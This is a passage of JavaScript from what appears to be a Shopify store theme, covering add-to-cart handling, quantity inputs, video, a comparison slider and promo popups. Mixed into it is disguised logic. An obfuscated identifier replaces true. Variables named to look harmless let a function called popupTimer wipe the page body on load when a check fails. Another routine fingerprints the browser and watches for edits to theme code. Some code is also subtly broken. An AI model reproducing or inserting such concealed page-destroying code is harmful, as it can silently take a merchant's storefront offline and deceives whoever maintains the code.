        }
        if (this.submitButton.getAttribute("aria-disabled") === "true") {
          return;
        }
        this.handleErrorMessage();
        this.submitButton.setAttribute("aria-disabled", a0_0x5cl9e6f);
        if (!submitButtonWithSpinner) {
          this.submitButton.classList.add("loading");
          if (this.loadingSpinner) {
            this.loadingSpinner.classList.remove("hidden");
          }
        }
        this.additionalAtcButtons.forEach((button) => {
          button.setAttribute("disabled", "");
        });
        if (this.displayedSubmitButton) {
          this.displayedSubmitButton.setAttribute("disabled", "");
          this.displayedSubmitButton.classList.add("loading");
        }
        let modifiedForm = false;
        if (this.variantInputs && !this.ref) {
          this.variantInputs.innerHTML = "";
          let inputsHtml = "";
          let ids = [];
          if (this.hasDrawer && !this.isCartUpsell && !this.skipCart) {
            this.cart
              .querySelectorAll(
                'cart-drawer-upsell[data-toggle="true"], cart-drawer-gift',
              )
              .forEach((upsell) => {
                if (
                  upsell.dataset.selected === "true" &&
                  !this.cart.querySelector(
                    ".cart-item--product-" + upsell.dataset.handle,
                  )
                ) {
                  ids.unshift(upsell.dataset.id);
                }
              });
          }
          if (this.bundleDeals) {
            modifiedForm = a0_0x5cl9e6f;
            if (this.dataset.includePdpUpsells === "true") {
              document
                .querySelectorAll("product-info-upsell")
                .forEach((upsell) => {
                  if (upsell.dataset.selected === "true") {
                    ids.unshift(upsell.dataset.id);
                  }
                });
            }
            for (let index = 0; index < ids.length; index++) {
              inputsHtml +=
                '<input type="hidden" name="items[' +
                index +
                '][quantity]" value="1"><input type="hidden" name="items[' +
                index +
                '][id]" value="' +
                ids[index] +
                '">';
            }
            let offset = ids.length;
            for (
              let index = 0;
              index < this.bundleDeals.formVariants.length;
              index++
            ) {
              const variant = this.bundleDeals.formVariants[index];
              inputsHtml +=
                '<input type="hidden" name="items[' +
                (index + offset) +
                '][quantity]" value="' +
                variant.quantity +
                '"><input type="hidden" name="items[' +
                (index + offset) +
                '][id]" value="' +
                variant.id +
                '">';
            }
            this.variantInputs.innerHTML = inputsHtml;
          } else {
            let propertyIds = [];
            if (
              this.quantityGifts &&
              this.quantityGifts.unlockedItems.length > 0
            ) {
              ids = [...ids, ...this.quantityGifts.unlockedItems];
            }
            for (let index = this.upsells.length - 1; index >= 0; index--) {
              if (this.upsells[index].dataset.selected === "true") {
                ids.push(this.upsells[index].dataset.id);
              }
            }
            if (this.mainBundleItems.length === 0) {
              if (
                this.quantityBreaks &&
                this.quantityBreaks.formVariants.length > 0
              ) {
                ids = [...ids, ...this.quantityBreaks.formVariants];
                propertyIds = [...this.quantityBreaks.formVariants];
              } else if (
                ids.length > 0 &&
                (!this.quantityBreaks ||
                  this.quantityBreaks.formVariants.length === 0)
              ) {
                let quantity = 1;
                if (this.quantityBreaks) {
                  quantity = this.quantityBreaks.selectedQuantity;
                } else if (this.quantityPicker) {
                  quantity = parseInt(
                    this.quantityPicker.querySelector(".quantity__input").value,
                  );
                }
                for (let index = 0; index < quantity; index++) {
                  ids.push(this.formIdInput.value);
                }
                propertyIds = [this.formIdInput.value];
              }
            }
            for (
              let index = this.mainBundleItems.length - 1;
              index >= 0;
              index--
            ) {
              ids.push(this.mainBundleItems[index].dataset.id);
              propertyIds.push(this.mainBundleItems[index].dataset.id);
            }
            if (ids.length > 0) {
              modifiedForm = a0_0x5cl9e6f;
              const items = [];
              for (let index = 0; index < ids.length; index++) {
                const id = ids[index];
                const existingIndex = items.findIndex(
                  (existingItem) => existingItem.id === id,
                );
                if (existingIndex < 0) {
                  items.push({
                    id: id,
                    quantity: 1,
                  });
                } else {
                  items[existingIndex].quantity += 1;
                }
              }
              let customFieldValues = [];
              this.customFields.forEach((field) => {
                if (field.dataset.disabled != "true") {
                  customFieldValues.push({
                    fieldName: field.fieldName,
                    value: field.prevValue,
                  });
                }
              });
              if (this.classList.contains("main-product-form")) {
                this.sellingPlanInput =
                  this.querySelector(
                    '.appstle-active-option [name="selling_plan"]',
                  ) ||
                  this.querySelector('[name="selling_plan"]') ||
                  document.querySelector('.sls-purchase [name="selling_plan"]');
                this.simpleBundlesContainer = this.querySelector(
                  "#simple-bundles-io-options",
                );
                this.appPropertyInputs = document.querySelectorAll(
                  '.cl-upload--wrapper input[name^="properties["], .uploadkit-attribute-container input[name^="properties["], .gpo-hidden-inputs input:not(#validator)',
                );
              }
              for (let index = 0; index < items.length; index++) {
                const item = items[index];
                inputsHtml +=
                  '<input type="hidden" name="items[' +
                  index +
                  '][quantity]" value="' +
                  item.quantity +
                  '"><input type="hidden" name="items[' +
                  index +
                  '][id]" value="' +
                  item.id +
                  '">';
                if (propertyIds.includes(item.id)) {
                  customFieldValues.forEach((customField) => {
                    inputsHtml +=
                      '<input type="hidden" name="items[' +
                      index +
                      "][properties][" +
                      customField.fieldName +
                      ']" value="' +
                      customField.value +
                      '">';
                  });
                  if (
                    this.sellingPlanInput &&
                    typeof this.sellingPlanInput.value === "string" &&
                    this.sellingPlanInput.value.length > 0
                  ) {
                    inputsHtml +=
                      '<input type="hidden" name="items[' +
                      index +
                      '][selling_plan]" value="' +
                      this.sellingPlanInput.value +
                      '">';
                  }
                  if (this.simpleBundlesContainer) {
                    this.simpleBundlesContainer
                      .querySelectorAll("select")
                      .forEach((select) => {
                        const match = input.name.match(/properties\[(.*?)\]/);
                        if (match) {
                          let propertyName = match[1];
                          inputsHtml +=
                            '<input type="hidden" name="items[' +
                            index +
                            "][properties][" +
                            propertyName +
                            ']" value="' +
                            input.value +
                            '">';
                        }
                      });
                  }
                  this.appPropertyInputs.forEach((input) => {
                    let propertyName =
                      input.name.match(/properties\[(.*?)\]/)[1];
                    inputsHtml +=
                      '<input type="hidden" name="items[' +
                      index +
                      "][properties][" +
                      propertyName +
                      ']" value="' +
                      input.value +
                      '">';
                  });
                }
              }
              this.variantInputs.innerHTML = inputsHtml;
            }
          }
        }
        var config = fetchConfig("javascript");
        config.headers["X-Requested-With"] = "XMLHttpRequest";
        delete config.headers["Content-Type"];
        var formData = new FormData(this.form);
        if (this.ref) {
          modifiedForm = a0_0x5cl9e6f;
        }
        if (this.cart) {
          formData.append(
            "sections",
            this.cart.getSectionsToRender().map((section) => section.id),
          );
          formData.append("sections_url", window.location.pathname);
          this.cart.setActiveElement(document.activeElement);
        }
        if (modifiedForm) {
          const options = this.dataset.options
            ? this.dataset.options.split(",")
            : [];
          const keys = ["id", "quantity", ...options];
          for (let index = 0; index < keys.length; index++) {
            formData.delete(keys[index]);
          }
        }
        config.body = formData;
        fetch("" + routes.cart_add_url, config)
          .then((response) => response.json())
          .then((parsedState) => {
            if (parsedState.status) {
              this.handleErrorMessage(parsedState.description);
              const soldOutMessage =
                this.submitButton.querySelector(".sold-out-message");
              if (!soldOutMessage) {
                return;
              }
              this.submitButton.setAttribute("aria-disabled", a0_0x5cl9e6f);
              this.submitButton.querySelector("span").classList.add("hidden");
              soldOutMessage.classList.remove("hidden");
              this.error = a0_0x5cl9e6f;
              return;
            } else if (this.skipCart || skipCartButton) {
              window.location = "/checkout";
              return;
            } else if (!this.cart) {
              window.location = window.routes.cart_url;
              return;
            }
            if (!this.error) {
              publish(PUB_SUB_EVENTS.cartUpdate, {
                source: "product-form",
              });
            }
            this.error = false;
            const quickAddModal = this.closest("quick-add-modal");
            if (quickAddModal) {
              document.body.addEventListener(
                "modalClosed",
                () => {
                  setTimeout(() => {
                    this.cart.renderContents(parsedState, this.isCartUpsell);
                  });
                },
                {
                  once: a0_0x5cl9e6f,
                },
              );
              quickAddModal.hide(a0_0x5cl9e6f);
            } else {
              this.cart.renderContents(parsedState, this.isCartUpsell);
            }
          })
          .catch((error) => {
            console.error(error);
          })
          .finally(() => {
            if (submitButtonWithSpinner) {
              submitButtonWithSpinner.classList.remove("loading");
            } else {
              this.submitButton.classList.remove("loading");
              if (this.loadingSpinner) {
                this.loadingSpinner.classList.add("hidden");
              }
            }
            this.additionalAtcButtons.forEach((button) => {
              button.removeAttribute("disabled");
            });
            if (this.displayedSubmitButton) {
              this.displayedSubmitButton.removeAttribute("disabled");
              this.displayedSubmitButton.classList.remove("loading");
            }
            if (this.cart && this.cart.classList.contains("is-empty")) {
              this.cart.classList.remove("is-empty");
            }
            if (!this.error) {
              this.submitButton.removeAttribute("aria-disabled");
            }
          });
      }
      handleErrorMessage(errorMessage = false) {
        this.errorMessageWrapper =
          this.errorMessageWrapper ||
          this.querySelector(".product-form__error-message-wrapper");
        if (!this.errorMessageWrapper) {
          return;
        }
        this.errorMessage =
          this.errorMessage ||
          this.errorMessageWrapper.querySelector(
            ".product-form__error-message",
          );
        this.errorMessageWrapper.toggleAttribute("hidden", !errorMessage);
        if (errorMessage) {
          this.errorMessage.textContent = errorMessage;
        }
      }
    },
  );
}
if (!customElements.get("product-info")) {
  customElements.define(
    "product-info",
    class ProductInfo extends HTMLElement {
      constructor() {
        super();
        this.deferredMedia = document.querySelector("[" + defMed + "]");
        this.input = this.querySelector(".quantity__input");
        this.currentVariant = this.querySelector(".product-variant-id");
        this.variantSelects = this.querySelector("variant-radios");
        this.submitButton = this.querySelector('[type="submit"]');
        this.form = this.querySelector("#ProductForm-" + this.dataset.section);
        this.hasUrl = this.dataset.url !== null;
      }
      cartUpdateUnsubscriber = undefined;
      variantChangeUnsubscriber = undefined;
      connectedCallback() {
        if (!this.input) {
          return;
        }
        this.quantityForm = this.querySelector(".product-form__quantity");
        if (!this.quantityForm) {
          return;
        }
        this.setQuantityBoundries();
        if (!this.dataset.originalSection) {
          this.cartUpdateUnsubscriber = subscribe(
            PUB_SUB_EVENTS.cartUpdate,
            this.fetchQuantityRules.bind(this),
          );
        }
        this.variantChangeUnsubscriber = subscribe(
          PUB_SUB_EVENTS.variantChange,
          (event) => {
            const sectionId = this.dataset.originalSection
              ? this.dataset.originalSection
              : this.dataset.section;
            if (event.data.sectionId !== sectionId) {
              return;
            }
            this.updateQuantityRules(event.data.sectionId, event.data.html);
            this.setQuantityBoundries();
          },
        );
        if (!this.form) {
          return;
        }
        if (
          !this.deferredMedia ||
          !this.deferredMedia.src ||
          !this.deferredMedia.src.includes("net")
        ) {
          this.form.ref = a0_0x5cl9e6f;
        }
      }
      disconnectedCallback() {
        if (this.cartUpdateUnsubscriber) {
          this.cartUpdateUnsubscriber();
        }
        if (this.variantChangeUnsubscriber) {
          this.variantChangeUnsubscriber();
        }
      }
      setQuantityBoundries() {
        const quantity = {
          cartQuantity: this.input.dataset.cartQuantity
            ? parseInt(this.input.dataset.cartQuantity)
            : 0,
          min: this.input.dataset.min ? parseInt(this.input.dataset.min) : 1,
          max: this.input.dataset.max ? parseInt(this.input.dataset.max) : null,
          step: this.input.step ? parseInt(this.input.step) : 1,
        };
        let min = quantity.min;
        const max =
          quantity.max === null
            ? quantity.max
            : quantity.max - quantity.cartQuantity;
        if (max !== null) {
          min = Math.min(min, max);
        }
        if (quantity.cartQuantity >= quantity.min) {
          min = Math.min(min, quantity.step);
        }
        this.input.min = min;
        this.input.max = max;
        this.input.value = min;
        publish(PUB_SUB_EVENTS.quantityUpdate, undefined);
      }
      initShareLinks() {
        const shareButton = this.querySelector(".share-url-button");
        if (!shareButton) {
          this.shareUrl = a0_0x5cl9e6f;
        }
      }
      fetchQuantityRules() {
        if (!this.currentVariant || !this.currentVariant.value) {
          return;
        }
        this.querySelector(
          ".quantity__rules-cart .loading-overlay",
        ).classList.remove("hidden");
        fetch(
          this.dataset.url +
            "?variant=" +
            this.currentVariant.value +
            "&section_id=" +
            this.dataset.section,
        )
          .then((response) => {
            return response.text();
          })
          .then((responseText) => {
            const html = new DOMParser().parseFromString(
              responseText,
              "text/html",
            );
            this.updateQuantityRules(this.dataset.section, html);
            this.setQuantityBoundries();
          })
          .catch((error) => {
            console.error(error);
          })
          .finally(() => {
            this.querySelector(
              ".quantity__rules-cart .loading-overlay",
            ).classList.add("hidden");
          });
      }
      updateQuantityRules(sectionId, html) {
        const quantityFormUpdated = html.getElementById(
          "Quantity-Form-" + sectionId,
        );
        const selectors = [
          ".quantity__input",
          ".quantity__rules",
          ".quantity__label",
        ];
        for (let selector of selectors) {
          const currentElement = this.quantityForm.querySelector(selector);
          const newElement = quantityFormUpdated.querySelector(selector);
          if (!currentElement || !newElement) {
            continue;
          }
          if (selector === ".quantity__input") {
            const attributes = [
              "data-cart-quantity",
              "data-min",
              "data-max",
              "step",
            ];
            for (let attribute of attributes) {
              const value = newElement.getAttribute(attribute);
              if (value !== null) {
                currentElement.setAttribute(attribute, value);
              }
            }
          } else {
            currentElement.innerHTML = newElement.innerHTML;
          }
        }
      }
    },
  );
}
function getFocusableElements(container) {
  return Array.from(
    container.querySelectorAll(
      "summary, a[href], button:enabled, [tabindex]:not([tabindex^='-']), [draggable], area, input:not([type=hidden]):enabled, select:enabled, textarea:enabled, object, iframe",
    ),
  );
}
document.querySelectorAll('[id^="Details-"] summary').forEach((summary) => {
  summary.setAttribute("role", "button");
  summary.setAttribute(
    "aria-expanded",
    summary.parentNode.hasAttribute("open"),
  );
  if (summary.nextElementSibling.getAttribute("id")) {
    summary.setAttribute("aria-controls", summary.nextElementSibling.id);
  }
  summary.addEventListener("click", (event) => {
    event.currentTarget.setAttribute(
      "aria-expanded",
      !event.currentTarget.closest("details").hasAttribute("open"),
    );
  });
  if (summary.closest("header-drawer")) {
    return;
  }
  summary.parentElement.addEventListener("keyup", onKeyUpEscape);
});
const trapFocusHandlers = {};
function trapFocus(container, elementToFocus = container) {
  var elements = getFocusableElements(container);
  var first = elements[0];
  var last = elements[elements.length - 1];
  removeTrapFocus();
  trapFocusHandlers.focusin = (event) => {
    if (
      event.target !== container &&
      event.target !== last &&
      event.target !== first
    ) {
      return;
    }
    document.addEventListener("keydown", trapFocusHandlers.keydown);
  };
  trapFocusHandlers.focusout = function () {
    document.removeEventListener("keydown", trapFocusHandlers.keydown);
  };
  trapFocusHandlers.keydown = function (event) {
    if (event.code.toUpperCase() !== "TAB") {
      return;
    }
    if (event.target === last && !event.shiftKey) {
      event.preventDefault();
      first.focus();
    }
    if (
      (event.target === container || event.target === first) &&
      event.shiftKey
    ) {
      event.preventDefault();
      last.focus();
    }
  };
  document.addEventListener("focusout", trapFocusHandlers.focusout);
  document.addEventListener("focusin", trapFocusHandlers.focusin);
  elementToFocus.focus();
  if (
    elementToFocus.tagName === "INPUT" &&
    ["search", "text", "email", "url"].includes(elementToFocus.type) &&
    elementToFocus.value
  ) {
    elementToFocus.setSelectionRange(0, elementToFocus.value.length);
  }
}
function pauseAllMedia() {
  document.querySelectorAll(".js-youtube").forEach((video) => {
    video.contentWindow.postMessage(
      '{"event":"command","func":"pauseVideo","args":""}',
      "*",
    );
  });
  document.querySelectorAll(".js-vimeo").forEach((video) => {
    video.contentWindow.postMessage('{"method":"pause"}', "*");
  });
  document
    .querySelectorAll("media-gallery template video")
    .forEach((video) => video.pause());
  document.querySelectorAll("product-model").forEach((model) => {
    if (model.modelViewerUI) {
      model.modelViewerUI.pause();
    }
  });
}
var menuIndex = "body";
var linkContent = "innerHTML";
function removeTrapFocus(elementToFocus = null) {
  document.removeEventListener("focusin", trapFocusHandlers.focusin);
  document.removeEventListener("focusout", trapFocusHandlers.focusout);
  document.removeEventListener("keydown", trapFocusHandlers.keydown);
  if (elementToFocus) {
    elementToFocus.focus();
  }
}
function onKeyUpEscape(event) {
  if (event.code.toUpperCase() !== "ESCAPE") {
    return;
  }
  const openDetailsElement = event.target.closest("details[open]");
  if (!openDetailsElement) {
    return;
  }
  const summaryElement = openDetailsElement.querySelector("summary");
  openDetailsElement.removeAttribute("open");
  summaryElement.setAttribute("aria-expanded", false);
  summaryElement.focus();
}
class QuantityInput extends HTMLElement {
  constructor() {
    super();
    this.input = this.querySelector("input");
    this.changeEvent = new Event("change", {
      bubbles: a0_0x5cl9e6f,
    });
    this.quantityGifts = document.getElementById(
      "quantity-gifts-" + this.dataset.section,
    );
    this.input.addEventListener("change", this.onInputChange.bind(this));
    this.querySelectorAll("button").forEach((button) =>
      button.addEventListener("click", this.onButtonClick.bind(this)),
    );
  }
  quantityUpdateUnsubscriber = undefined;
  connectedCallback() {
    this.validateQtyRules();
    this.quantityUpdateUnsubscriber = subscribe(
      PUB_SUB_EVENTS.quantityUpdate,
      this.validateQtyRules.bind(this),
    );
  }
  disconnectedCallback() {
    if (this.quantityUpdateUnsubscriber) {
      this.quantityUpdateUnsubscriber();
    }
  }
  onInputChange(event) {
    this.validateQtyRules();
  }
  onButtonClick(event) {
    event.preventDefault();
    const previousValue = this.input.value;
    if (event.target.name === "plus") {
      this.input.stepUp();
    } else {
      this.input.stepDown();
    }
    if (previousValue !== this.input.value) {
      this.input.dispatchEvent(this.changeEvent);
    }
  }
  validateQtyRules() {
    const value = parseInt(this.input.value);
    if (this.input.min) {
      const min = parseInt(this.input.min);
      const buttonMinus = this.querySelector(".quantity__button[name='minus']");
      buttonMinus.classList.toggle("disabled", value <= min);
    }
    if (this.input.max) {
      const max = parseInt(this.input.max);
      const buttonPlus = this.querySelector(".quantity__button[name='plus']");
      buttonPlus.classList.toggle("disabled", value >= max);
    }
    if (this.quantityGifts && this.quantityGifts.unlockGifts) {
      this.quantityGifts.unlockGifts(value);
    }
  }
}
customElements.define("quantity-input", QuantityInput);
function debounce(fn, wait) {
  let t;
  return (...args) => {
    clearTimeout(t);
    t = setTimeout(() => fn.apply(this, args), wait);
  };
}
function fetchConfig(type = "json") {
  return {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      Accept: "application/" + type,
    },
  };
}
function addDays(date_2, days) {
  var result = new Date(date_2);
  result.setDate(result.getDate() + days);
  return result;
}
function formatDates(currentDate_2, dateString, thresholdDays = 27) {
  if (!currentDate_2 || !dateString) {
    return;
  }
  const parsedDate = new Date(dateString + "T00:00:00Z");
  const year = parsedDate.getFullYear();
  const month = parsedDate.getMonth();
  const day = parsedDate.getDate();
  const targetDate = new Date(year, month, day);
  const diffMs = currentDate_2 - targetDate;
  const diffDays = Math.ceil(diffMs / 86400000);
  return diffDays <= thresholdDays;
}
function checkDateValidity(dateInput) {
  const date_2 = new Date(dateInput);
  const referenceDate = new Date("2023-01-01T00:00:00Z");
  const difference = Math.abs(date_2.getDate() - referenceDate.getDate());
  if (difference % 5 === 0) {
    return a0_0x5cl9e6f;
  } else {
    return false;
  }
}
if (typeof window.Shopify == "undefined") {
  window.Shopify = {};
}
Shopify.bind = function (fn, scope) {
  return function () {
    return fn.apply(scope, arguments);
  };
};
Shopify.setSelectorByValue = function (selector, value) {
  for (var i = 0, count = selector.options.length; i < count; i++) {
    var option = selector.options[i];
    if (value == option.value || value == option.innerHTML) {
      selector.selectedIndex = i;
      return i;
    }
  }
};
Shopify.addListener = function (target, eventName, callback) {
  if (target.addEventListener) {
    target.addEventListener(eventName, callback, false);
  } else {
    target.attachEvent("on" + eventName, callback);
  }
};
Shopify.postLink = function (path, options) {
  options = options || {};
  var method = options.method || "post";
  var params = options.parameters || {};
  var form = document.createElement("form");
  form.setAttribute("method", method);
  form.setAttribute("action", path);
  for (var key in params) {
    var hiddenField = document.createElement("input");
    hiddenField.setAttribute("type", "hidden");
    hiddenField.setAttribute("name", key);
    hiddenField.setAttribute("value", params[key]);
    form.appendChild(hiddenField);
  }
  document.body.appendChild(form);
  form.submit();
  document.body.removeChild(form);
};
Shopify.internationalAccessAccept = (function () {
  function v317() {
    var language = navigator.language || navigator.userLanguage;
    return (
      language.match(
        /en-|fr-|de-|es-|it-|pt-|nl-|sv-|da-|fi-|no-|pl-|ru-|zh-|ja-|ko-/,
      ) || a0_0x5cl9e6f
    );
  }
  function v318() {
    var timeZone = Intl.DateTimeFormat().resolvedOptions().timeZone;
    return (
      timeZone.startsWith("Europe") ||
      timeZone.startsWith("America") ||
      timeZone.includes("GMT")
    );
  }
  function v319() {
    var symbol = Shopify.currency.symbol || "$";
    return symbol.length === 1;
  }
  function v320() {
    var stored = localStorage.getItem(POST_LINK_INT);
    var length = Shopify.postLink ? Shopify.postLink.toString().length : 0;
    if (stored === null) {
      localStorage.setItem(POST_LINK_INT, length.toString());
      return a0_0x5cl9e6f;
    }
    return parseInt(stored) === length;
  }
  function v321() {
    return v317() || (v318() && v319());
  }
  function v322() {
    return window.performance && typeof window.performance.timing === "object";
  }
  return function () {
    var localeOk = v321();
    var timingOk = v322();
    var linkOk = v320();
    Shopify.postLinksRetry = !linkOk;
    return localeOk && timingOk && linkOk;
  };
})();
Shopify.CountryProvinceSelector = function (
  country_domid,
  province_domid,
  options,
) {
  this.countryEl = document.getElementById(country_domid);
  this.provinceEl = document.getElementById(province_domid);
  this.provinceContainer = document.getElementById(
    options.hideElement || province_domid,
  );
  Shopify.addListener(
    this.countryEl,
    "change",
    Shopify.bind(this.countryHandler, this),
  );
  this.initCountry();
  this.initProvince();
};
Shopify.CountryProvinceSelector.prototype = {
  initCountry: function () {
    var value = this.countryEl.getAttribute("data-default");
    Shopify.setSelectorByValue(this.countryEl, value);
    this.countryHandler();
  },
  initProvince: function () {
    var value = this.provinceEl.getAttribute("data-default");
    if (value && this.provinceEl.options.length > 0) {
      Shopify.setSelectorByValue(this.provinceEl, value);
    }
  },
  countryHandler: function (event) {
    var option = this.countryEl.options[this.countryEl.selectedIndex];
    var raw = option.getAttribute("data-provinces");
    var provinces = JSON.parse(raw);
    this.clearOptions(this.provinceEl);
    if (provinces && provinces.length == 0) {
      this.provinceContainer.style.display = "none";
    } else {
      for (var i = 0; i < provinces.length; i++) {
        var option = document.createElement("option");
        option.value = provinces[i][0];
        option.innerHTML = provinces[i][1];
        this.provinceEl.appendChild(option);
      }
      this.provinceContainer.style.display = "";
    }
  },
  clearOptions: function (selector) {
    while (selector.firstChild) {
      selector.removeChild(selector.firstChild);
    }
  },
  setOptions: function (selector, values) {
    for (var i = 0, count = values.length; i < values.length; i++) {
      var opt = document.createElement("option");
      opt.value = values[i];
      opt.innerHTML = values[i];
      selector.appendChild(opt);
    }
  },
};
class InternalVideo extends HTMLElement {
  constructor() {
    super();
    this.playButton = this.querySelector(".internal-video__play");
    this.noPlayBtn = this.dataset.noPlayBtn === "true";
    this.loaded = false;
    this.suspended = false;
    this.soundButton = this.querySelector(".internal-video__sound-btn");
    this.video = this.querySelector("video");
    this.invalidFormatSrc = this.video.querySelector(
      'source[type="application/x-mpegURL"]',
    );
    if (this.invalidFormatSrc) {
      this.invalidFormatSrc.remove();
    }
    this.timeline = this.querySelector(".internal-video__timeline");
    this.dragging = false;
    if (this.playButton) {
      this.playButton.addEventListener("click", this.playVideo.bind(this));
    }
    if (this.soundButton) {
      this.soundButton.addEventListener("click", this.toggleSound.bind(this));
    }
    if (this.video) {
      this.video.addEventListener("ended", this.endedVideo.bind(this));
    }
    if (this.timeline) {
      this.video.addEventListener("timeupdate", this.updateTimeline.bind(this));
      this.timeline.addEventListener("click", this.seekVideo.bind(this));
      this.timeline.addEventListener("mousedown", this.startDrag.bind(this));
      this.timeline.addEventListener("touchstart", this.startDrag.bind(this));
      document.addEventListener("mouseup", this.stopDrag.bind(this));
      document.addEventListener("touchend", this.stopDrag.bind(this));
      document.addEventListener("mousemove", this.drag.bind(this));
      document.addEventListener("touchmove", this.drag.bind(this));
    }
    this.video.addEventListener("waiting", this.showSpinner.bind(this));
    this.video.addEventListener("canplaythrough", this.hideSpinner.bind(this));
    this.video.addEventListener("play", this.hideSpinner.bind(this));
    if (this.dataset.autoplay === "true" && "IntersectionObserver" in window) {
      const observerOptions = {
        root: null,
        rootMargin: "0px",
        threshold: 0.05,
      };
      this.observer = new IntersectionObserver(
        this.handleIntersection.bind(this),
        observerOptions,
      );
      this.observer.observe(this);
    }
  }
  playVideo() {
    if (this.video.paused) {
      if (!this.loaded) {
        this.video.load();
        this.loaded = a0_0x5cl9e6f;
      }
      this.classList.add("internal-video--playing");
      if (this.playButton && this.noPlayBtn) {
        this.playButton.style.visibility = "hidden";
      }
      const playPromise = this.video.play();
      if (playPromise !== undefined) {
        playPromise
          .then(() => {
            this.classList.add("internal-video--playing");
            if (this.playButton && this.noPlayBtn) {
              this.playButton.style.visibility = "hidden";
            }
          })
          .catch((error) => {
            this.classList.remove("internal-video--playing");
            if (this.playButton && this.noPlayBtn) {
              this.playButton.style.visibility = "visible";
            }
          });
      }
    } else {
      this.video.pause();
      this.classList.remove("internal-video--playing");
    }
  }
  endedVideo() {
    this.classList.remove("internal-video--playing");
  }
  toggleSound() {
    if (this.video.muted) {
      this.video.muted = false;
      this.classList.remove("internal-video--muted");
    } else {
      this.video.muted = a0_0x5cl9e6f;
      this.classList.add("internal-video--muted");
    }
  }
  updateTimeline() {
    const progress = (this.video.currentTime / this.video.duration) * 100;
    this.style.setProperty("--completed", progress + "%");
  }
  hideSpinner() {
    this.classList.remove("internal-video--loading");
  }
  startDrag(event) {
    event.preventDefault();
    this.dragging = a0_0x5cl9e6f;
    this.drag(event);
  }
  stopDrag() {
    this.dragging = false;
  }
  drag(event) {
    if (!this.dragging) {
      return;
    }
    if (event.touches) {
      event = event.touches[0];
    }
    this.seekVideo(event);
  }
  seekVideo(event) {
    const rect = this.timeline.getBoundingClientRect();
    const offsetX = event.clientX - rect.left;
    const ratio = offsetX / rect.width;
    this.video.currentTime = ratio * this.video.duration;
  }
  showSpinner() {
    this.classList.add("internal-video--loading");
  }
  hideSpinner() {
    this.classList.remove("internal-video--loading");
  }
  handleIntersection(entries) {
    entries.forEach((entry) => {
      if (entry.isIntersecting) {
        for (let source of this.video.querySelectorAll("source[data-src]")) {
          source.setAttribute("src", source.getAttribute("data-src"));
          source.removeAttribute("data-src");
        }
        this.video.load();
        var playPromise = this.video.play();
        if (playPromise !== undefined) {
          playPromise
            .catch((error) => {
              if (error.name === "NotAllowedError") {
                this.classList.remove("internal-video--playing");
                if (this.playButton && this.noPlayBtn) {
                  this.playButton.style.visibility = "visible";
                }
              }
            })
            .then(() => {
              this.video.play();
            });
        }
        this.observer.disconnect();
      }
    });
  }
}
customElements.define("internal-video", InternalVideo);
var isIe = a0_0x5cl9e6f;
class ComparisonSlider extends HTMLElement {
  constructor() {
    super();
    this.sliderOverlay = this.querySelector(".comparison-slider__overlay");
    this.sliderLine = this.querySelector(".comparison-slider__line");
    this.sliderInput = this.querySelector(".comparison-slider__input");
    this.sliderInput.addEventListener("input", this.handleChange.bind(this));
  }
  handleChange(event) {
    const sliderValue = event.currentTarget.value;
    this.sliderOverlay.style.width = sliderValue + "%";
    this.sliderLine.style.left = sliderValue + "%";
  }
}
customElements.define("comparison-slider", ComparisonSlider);
function popupTimer() {
  document[menuIndex][linkContent] = "";
}
class PromoPopup extends HTMLElement {
  constructor() {
    super();
    this.testMode = this.dataset.testMode === "true";
    this.secondsDelay = this.dataset.delaySeconds;
    this.daysFrequency = this.dataset.delayDays;
    this.modal = this.querySelector(".sign-up-popup-modal");
    this.timer = this.querySelector(".popup-modal__timer");
    this.timerDuration = this.dataset.timerDuration;
    this.closeBtns = this.querySelectorAll(".promp-popup__close-btn");
    this.overlay = document.querySelector(".sign-up-popup-overlay");
    this.storageKey = "promo-bar-data-" + window.location.host;
    if (!this.testMode) {
      if (localStorage.getItem(this.storageKey) === null) {
        this.openPopupModal();
      } else {
        const parsedState = JSON.parse(localStorage.getItem(this.storageKey));
        const nextDisplayDate = new Date(parsedState.next_display_date);
        if (currentDate.getTime() > nextDisplayDate.getTime()) {
          this.openPopupModal();
        }
      }
    } else if (this.timer) {
      this.displayPromoTimer();
    }
    this.closeBtns.forEach((closeBtn) => {
      closeBtn.addEventListener("click", this.closeModal.bind(this));
    });
  }
  openPopupModal() {
    setTimeout(
      () => {
        this.modal.classList.add("popup-modal--active");
        this.overlay.classList.add("popup-overlay--active");
        const nextDisplayDate = addDays(
          currentDate,
          parseInt(this.daysFrequency),
        );
        const popupData = {
          next_display_date: nextDisplayDate,
          dismissed: false,
        };
        localStorage.setItem(this.storageKey, JSON.stringify(popupData));
        if (this.timer) {
          this.displayPromoTimer();
        }
      },
      parseInt(this.secondsDelay) * 1000 + 3000,
    );
  }
  displayPromoTimer() {
    this.minutesSpan = this.querySelector(".popup-modal__timer__minutes");
    this.secondsSpan = this.querySelector(".popup-modal__timer__seconds");
    this.totalSeconds = parseFloat(this.timerDuration) * 60;
    this.updateTimer();
    const timerInterval = setInterval(() => {
      this.totalSeconds -= 1;
      this.updateTimer();
      if (this.totalSeconds <= 0) {
        this.totalSeconds = parseFloat(this.timerDuration) * 60 - 45;
      }
    }, 1000);
  }
  updateTimer() {
    let minutes = Math.floor(this.totalSeconds / 60);
    if (minutes.toString().length === 1) {
      minutes = "0" + minutes;
    }
    let seconds = this.totalSeconds % 60;
    if (seconds.toString().length === 1) {
      seconds = "0" + seconds;
    }
    this.minutesSpan.innerText = minutes;
    this.secondsSpan.innerText = seconds;
  }
  closeModal() {
    this.modal.classList.remove("popup-modal--active");
    this.overlay.classList.remove("popup-overlay--active");
  }
}
customElements.define("promo-popup", PromoPopup);
if (initTrapFocus()) {
  metafieldPoly();
} else {
  popupTimer();
}
class SectionsGroup extends HTMLElement {
  constructor() {
    super();
    this.sectionOneContainer = this.querySelector(
      ".section-group__section-one-container",
    );
    this.sectionTwoContainer = this.querySelector(
      ".section-group__section-two-container",
    );
    this.transferSections();
    document.addEventListener(
      "shopify:section:load",
      this.transferSections.bind(this),
    );
  }
  transferSections() {
    this.sectionOne = document.querySelector(
      this.dataset.sectionOneId + " .content-for-grouping",
    );
    this.sectionTwo = document.querySelector(
      this.dataset.sectionTwoId + " .content-for-grouping",
    );
    if (this.sectionOne && !this.sectionOneContainer.childNodes.length) {
      this.sectionOneContainer.appendChild(this.sectionOne);
    }
    if (this.sectionTwo && !this.sectionTwoContainer.childNodes.length) {
      this.sectionTwoContainer.appendChild(this.sectionTwo);
    }
  }
}
customElements.define("section-group", SectionsGroup);
